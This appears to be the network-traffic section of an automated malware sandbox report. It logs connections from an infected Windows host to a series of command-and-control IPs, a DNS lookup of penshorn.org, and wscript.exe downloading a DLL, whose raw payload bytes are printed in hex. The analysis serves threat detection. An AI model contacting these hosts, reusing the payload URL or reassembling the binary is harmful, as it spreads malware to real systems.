                                                                                                Mar 17, 2023 09:07:13.877799988 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:13.920674086 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.881594896 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.881666899 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.881794930 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.881938934 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.882110119 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:16.909288883 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:16.909466028 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:17.980118036 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.080662966 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.080837011 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.081284046 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.182641983 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.191973925 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.192049026 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.192212105 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.204938889 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.306385994 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:18.313245058 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:18.453480959 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:19.321127892 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:19.374325991 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321366072 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.321445942 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.321580887 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321717024 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.321760893 CET496887080192.168.2.466.228.32.31
                                                                                                Mar 17, 2023 09:07:22.421813011 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:22.421905994 CET70804968866.228.32.31192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.162928104 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.163026094 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.163177967 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.164298058 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.164345026 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.942322016 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.942528963 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.949018002 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.949038982 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.949441910 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:23.951169968 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:23.951189041 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.046781063 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.046938896 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.047255039 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048105001 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048147917 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:25.048180103 CET49689443192.168.2.4182.162.143.56
                                                                                                Mar 17, 2023 09:07:25.048194885 CET44349689182.162.143.56192.168.2.4
                                                                                                Mar 17, 2023 09:07:30.974205971 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.203985929 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.204660892 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.205951929 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.435683966 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.450947046 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.450994015 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.451162100 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.456162930 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.686403036 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:31.688262939 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:31.957545042 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:32.965385914 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:33.016030073 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.964777946 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:35.964816093 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:35.964976072 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.968456030 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:35.968518019 CET4969080192.168.2.4187.63.160.88
                                                                                                Mar 17, 2023 09:07:36.198014975 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:36.198091984 CET8049690187.63.160.88192.168.2.4
                                                                                                Mar 17, 2023 09:07:36.723536015 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:36.892431974 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:37.407073975 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:37.574215889 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:38.079041004 CET496918080192.168.2.4167.172.199.165
                                                                                                Mar 17, 2023 09:07:38.246161938 CET808049691167.172.199.165192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.728916883 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.728981018 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.729094982 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.729778051 CET49692443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.729794979 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.762868881 CET44349692164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.764467955 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.764552116 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.764771938 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.766184092 CET49693443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.766242027 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.800620079 CET44349693164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.804982901 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.805053949 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.805609941 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.807570934 CET49694443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.807612896 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.841613054 CET44349694164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.847589016 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.847645044 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.847801924 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.848376036 CET49695443192.168.2.4164.90.222.65
                                                                                                Mar 17, 2023 09:07:43.848397017 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:43.882746935 CET44349695164.90.222.65192.168.2.4
                                                                                                Mar 17, 2023 09:07:50.440401077 CET496968080192.168.2.4104.168.155.143
                                                                                                Mar 17, 2023 09:07:50.604892969 CET808049696104.168.155.143192.168.2.4
                                                                                                Mar 17, 2023 09:07:51.199918032 CET496968080192.168.2.4104.168.155.143
Mar 17, 2023 09:07:51.364449024 CET | 8080 | 49696 | 104.168.155.143 | 192.168.2.4
Mar 17, 2023 09:07:51.899883032 CET | 49696 | 8080 | 192.168.2.4 | 104.168.155.143
Mar 17, 2023 09:07:52.064246893 CET | 8080 | 49696 | 104.168.155.143 | 192.168.2.4
Mar 17, 2023 09:07:57.417993069 CET | 49697 | 8080 | 192.168.2.4 | 163.44.196.120
Mar 17, 2023 09:07:57.630830050 CET | 8080 | 49697 | 163.44.196.120 | 192.168.2.4
Mar 17, 2023 09:07:58.145246029 CET | 49697 | 8080 | 192.168.2.4 | 163.44.196.120
Mar 17, 2023 09:07:58.358165979 CET | 8080 | 49697 | 163.44.196.120 | 192.168.2.4
Mar 17, 2023 09:07:58.869560003 CET | 49697 | 8080 | 192.168.2.4 | 163.44.196.120
Mar 17, 2023 09:07:59.082464933 CET | 8080 | 49697 | 163.44.196.120 | 192.168.2.4
Mar 17, 2023 09:08:04.454890013 CET | 49698 | 8080 | 192.168.2.4 | 160.16.142.56
Mar 17, 2023 09:08:07.601447105 CET | 49698 | 8080 | 192.168.2.4 | 160.16.142.56
Mar 17, 2023 09:08:13.601902008 CET | 49698 | 8080 | 192.168.2.4 | 160.16.142.56
Mar 17, 2023 09:08:20.420095921 CET | 49699 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.420196056 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.420330048 CET | 49699 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.421067953 CET | 49699 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.421127081 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.689342022 CET | 443 | 49699 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.691514015 CET | 49700 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.691600084 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.692032099 CET | 49700 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.692589045 CET | 49700 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.692627907 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.958555937 CET | 443 | 49700 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.961616039 CET | 49701 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.961689949 CET | 443 | 49701 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:20.962076902 CET | 49701 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.962744951 CET | 49701 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:20.962775946 CET | 443 | 49701 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:21.261420012 CET | 443 | 49701 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:21.263144016 CET | 49702 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:21.263223886 CET | 443 | 49702 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:21.263452053 CET | 49702 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:21.264353037 CET | 49702 | 443 | 192.168.2.4 | 159.89.202.34
Mar 17, 2023 09:08:21.264384031 CET | 443 | 49702 | 159.89.202.34 | 192.168.2.4
Mar 17, 2023 09:08:21.523734093 CET | 443 | 49702 | 159.89.202.34 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2023 09:06:23.756524086 CET | 62577 | 53 | 192.168.2.4 | 8.8.8.8
Mar 17, 2023 09:06:23.774235964 CET | 53 | 62577 | 8.8.8.8 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 17, 2023 09:06:23.756524086 CET | 192.168.2.4 | 8.8.8.8 | 0xeaaa | Standard query (0) | penshorn.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 17, 2023 09:06:23.774235964 CET | 8.8.8.8 | 192.168.2.4 | 0xeaaa | No error (0) | penshorn.org | (none) | 203.26.41.131 | A (IP address) | IN (0x0001) | false

• penshorn.org
• 182.162.143.56

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49685 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49689 | 182.162.143.56 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49690 | 187.63.160.88 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49685 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-17 08:06:24 UTC | 0 | OUT | GET /admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
2023-03-17 08:06:24 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 17 Mar 2023 08:06:24 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 17 Mar 2023 08:06:24 GMT
Content-Disposition: attachment; filename="HI8auq9R7DjJI9Xd0sXHrrNQ8ULm.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 64141f80cbc98=1679040384; expires=Fri, 17-Mar-2023 08:07:24 GMT; Max-Age=60; path=/
Last-Modified: Fri, 17 Mar 2023 08:06:24 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
                                                                                                Data Ascii: 4000f@|h@@T@zB0|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
                                                                                                2023-03-17 08:06:25 UTC136INData Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac
                                                                                                Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
                                                                                                2023-03-17 08:06:25 UTC144INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC144INData Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30
                                                                                                Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
                                                                                                2023-03-17 08:06:25 UTC152INData Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec
                                                                                                Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
                                                                                                2023-03-17 08:06:25 UTC160INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:25 UTC160INData Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93
                                                                                                Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
                                                                                                2023-03-17 08:06:25 UTC168INData Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 1e ae f0 06 c4 83 aa ea 62
                                                                                                Data Ascii: Btp}|a-.$QItlOUs9Eg0u],C4HO0bq^c7D\OU'qg5\X.O4,G9?*4$8E!QqPk!-_fF0 !d4z-x<IpD^++.!-@&E)K$ !-Tnyp-K/s|Ur\m|'&bA@l=VM%(b
                                                                                                2023-03-17 08:06:25 UTC176INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC176INData Raw: 34 30 30 30 0d 0a 70 8e 94 63 5d 32 2d 53 28 e0 28 21 7e a0 b1 95 a0 fb aa 66 95 51 fd b3 3e e1 65 39 da 0f 2c bf d2 49 a1 41 ea a4 e4 93 50 ec 84 de 42 da 65 73 e4 4c 27 44 6d 1c e0 82 50 6c 7c f9 49 41 70 09 8e 39 da 0f 2c c1 7e ba ac 45 79 c3 3c 7a 53 ad 08 2f b3 b2 f9 81 ec 6c 27 aa 04 7a 62 8e b4 68 f0 0d 24 20 76 c1 fa aa 14 5a bd 0d d3 a5 2e 18 f4 4c 35 7a 92 43 5d 32 2f 16 30 02 ec 7c 27 aa 3c 7a 3d a3 71 c7 f0 3d 24 40 ff 68 30 a0 24 5a b0 74 ba b7 e0 45 79 ed 70 9e 94 63 5d 35 d7 53 28 ea 28 21 e5 94 c6 9f c0 06 2d 18 7d 87 c3 d8 79 70 af 14 ae bd b5 3d 2b e7 fd a6 47 ef 70 62 da 63 99 f0 01 83 28 6a 65 39 fe 46 a1 69 c0 06 e5 f9 6c 78 3c d8 49 b8 b1 3c 51 42 f3 0d 2b f5 44 00 61 e5 78 62 2a 3a 1f ac 2f 16 30 45 ec 7c 27 aa 34 7a 61 04 ca 8b b0
                                                                                                Data Ascii: 4000pc]2-S((!~fQ>e9,IAPBesL'DmPl|IAp9,~Ey<zS/l'zbh$ vZ.L5zC]2/0|'<z=q=$@h0$ZtEypc]5S((!-}yp=+Gpbc(je9Filx<I<QB+Daxb*:/0E|'4za
                                                                                                2023-03-17 08:06:26 UTC184INData Raw: a0 fb e8 33 01 67 fd b3 3f e1 a5 99 52 42 34 c3 be da 68 00 61 93 d4 51 99 9e 08 a6 8b e9 f9 82 66 f3 fe c2 74 eb cc fb 36 74 71 f9 b9 e1 3f 68 30 45 4c 42 34 c9 86 da 68 00 61 35 b1 79 53 e1 c0 87 47 53 28 21 c1 39 3f aa c4 d2 42 43 35 25 b1 47 e9 d2 b1 d8 33 21 51 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da ab f5 34 44 53 a9 de d5 3a 3f 2b 3f 9c aa 41 71 ff fc c8 3f 59 3c e3 a5 99 52 42 34 c3 be a2 68 00 61 8c c7 3f ac d9 ce ff cf d6 e0 68 65 39 14 e3 17 e1 3d 0f 55 28 04 7d 5a d0 48 24 50 e6 d4 82 37 48 33 85 85 00 61 28 b8 3e 77 46 c4 82 84 50 28 6b 89 05 38 32 f0 e7 81 40 35 74 55 dd c3 a6 bd dd f0 22 51 42 95 eb 34 7b ac 85 d1 67 35 7a e6 a9 45 37 2f d6 98 68 65 39 60 a2 f4 d2 42 43 35 f5 f4 c8 3f 59 3c 4e 87 21 51 c3 81 f8 30 62 6b 71 3a 4e e9 f1 de 96 46
                                                                                                Data Ascii: 3g?RB4haQft6tq?h0ELB4ha5ySGS(!9?BC5%G3!Qc|4DS:?+?Aq?Y<RB4ha?he9=U(}ZH$P7H3a(>wFP(k82@5tU"QB4{g5zE7/he9`BC5?Y<N!Q0bkq:NF
                                                                                                2023-03-17 08:06:26 UTC192INData Raw: 0d 0a
                                                                                                Data Ascii:
                                                                                                2023-03-17 08:06:26 UTC192INData Raw: 34 30 30 30 0d 0a fe 78 e2 ba 8c 3a f5 ea 98 64 c8 0e 42 f5 04 0f df 3e d9 81 bb 64 26 cb 71 5f f4 27 1c 76 0f 64 35 c2 f6 67 5f 93 cf 1e 5f 9c 84 12 f5 fa 98 61 8b 82 dc 71 f8 35 4b d8 49 1f e1 42 a8 da bf 0d 44 eb 2e 2b a6 21 42 d0 07 26 45 f6 29 24 25 ea 28 4e ca b4 85 8c c0 36 42 ea a5 58 c6 d2 79 1f b9 64 62 85 71 3f fd 45 6b 00 20 ef f4 f1 1e 51 b2 d6 85 b9 2c e2 30 4e be 5e 06 5c 7f 03 dd ff 34 0f b5 1c 3f af 75 56 fc ae 34 48 b2 27 1c 26 a4 9b ca bb 3e 51 46 f6 29 24 2c ea 10 4e 46 6b 4c 74 ca 06 42 fd 34 6b fb 1c 4b 80 ff 21 51 03 bf 89 b8 2f 1c f7 80 a5 df 7e da 73 32 5c 01 24 5c e2 20 4e be 6e 06 50 01 bc ca f5 04 0f 7a 29 a5 f6 bb 64 26 cb 71 4f f4 27 1c bf 34 64 35 3b d8 e7 c4 42 33 32 9e d4 cb b8 4a 5c 34 3e ab 8e b4 31 06 e9 90 59 3c e9 45
                                                                                                Data Ascii: 4000x:dB>d&q_'vd5g__aq5KIBD.+!B&E)$%(N6BXydbq?Ek Q,0N^\4?uV4H'&>QF)$,NFkLtB4kK!Q/~s2\$\ NnPz)d&qO'4d5;B32J\4>1Y<E
                                                                                                2023-03-17 08:06:26 UTC200INData Raw: 3c 56 b8 c1 34 21 51 7f 40 08 33 62 64 84 21 66 35 7a 6e 5f ad 37 44 5c ac 40 67 39 3f 16 83 8d 41 43 3a f1 0d 7c 3c 59 fb 2d 33 a6 97 42 34 23 76 61 40 89 24 67 8d 73 98 1b c8 b6 01 50 96 87 9a c6 be 6e 72 f2 d1 bc ca f5 34 7b bf b3 3c 68 b1 54 52 3c f4 69 33 a5 2e ff 99 25 35 7a d2 63 ba c1 b7 53 28 aa 00 c6 36 aa 34 9d 25 7c 35 74 f0 3d c3 23 66 97 cf a0 24 bd ea 3d 58 60 ac 45 6a 18 c1 7a 53 ad 08 3c b3 b2 e9 81 60 b0 6a 20 f0 17 4a 1a 31 d5 e5 f9 49 52 53 68 91 b5 96 07 3b cd 03 62 6b 8b 24 6b b8 76 d3 af 08 38 c5 26 27 31 8b 38 3f ec 34 99 18 53 35 74 f0 3d c7 9b 83 68 30 a0 1c b9 cb 3f ac ad aa 65 9a 60 b4 0f a8 d4 cb c0 bd 94 6d 78 14 77 3f 2b f0 2f 52 df db 13 76 f9 49 4a 49 35 57 26 96 07 c3 eb 6b 62 6b 6b 24 93 7f f3 16 d1 fd fe 06 45 9a e0 28
